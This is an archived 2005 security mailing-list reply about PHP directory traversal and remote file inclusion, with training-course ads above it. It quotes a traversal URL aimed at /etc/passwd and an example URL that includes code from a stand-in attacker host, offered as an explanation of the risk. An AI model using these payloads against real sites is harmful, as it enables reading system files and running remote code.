Network Security: Detailed info on Re: PHP Directory Transversal

Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.

Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.

Network Security Pen-Test

[Top] [All Lists]

Re: PHP Directory Transversal

from [John GALLET] Network Security

[Permanent Link]

Subject:	Re: PHP Directory Transversal
Date:	Mon, 14 Mar 2005 09:06:25 +0100 (CET)

Hi there,

Therefore, I tried doing a 
www.example.com/static.php?page=../../../../../../etc/passwd
but I get an error saying that file doesn't exist.
I user the same source code in my server, and I could retrieve the 
file...what can be happening? I don't think it is under a chroot jail...


What you can or can not read depends on the configuration of php 
(include_path vs safe mode for example). Have a look at : 
http://fr3.php.net/features.safe-mode

Now the real risk is not so much reading some source code as executing 
some other people's code. 

www.example.com/static.php?page=http://evilcracker.com/evil_code.txt 
has good chances of also getting executed, which opens the path to 
install any backdoor, download perl scripts/trojans, etc...

HTH
JG

[More with this subject...]

<Prev in Thread]	Current Thread	[Next in Thread>
Re: PHP Directory Transversal, (continued) Re: PHP Directory Transversal, David M. Zendzian Re: PHP Directory Transversal, Cedric Foll RE: PHP Directory Transversal, Ravish Terminal Services, AEHeald Re: Terminal Services, Kinnell RE: Terminal Services, Jerry Shenk Re: Terminal Services, John the Kiwi RE: Terminal Services, Ola RE: Terminal Services, Mark Woan Re: PHP Directory Transversal, Sarath Kummamuru Re: PHP Directory Transversal, John GALLET <= Re: PHP Directory Transversal, Andres Molinetti

Previous by Date:	Pen Testing capabilities of Flash Files, roger . franks
Next by Date:	MS SQL MDF FILE, Irvin Temp
Previous by Thread:	Re: PHP Directory Transversal, Sarath Kummamuru
Next by Thread:	Re: PHP Directory Transversal, Andres Molinetti
Indexes:	[Date] [Thread] [Top] [All Lists]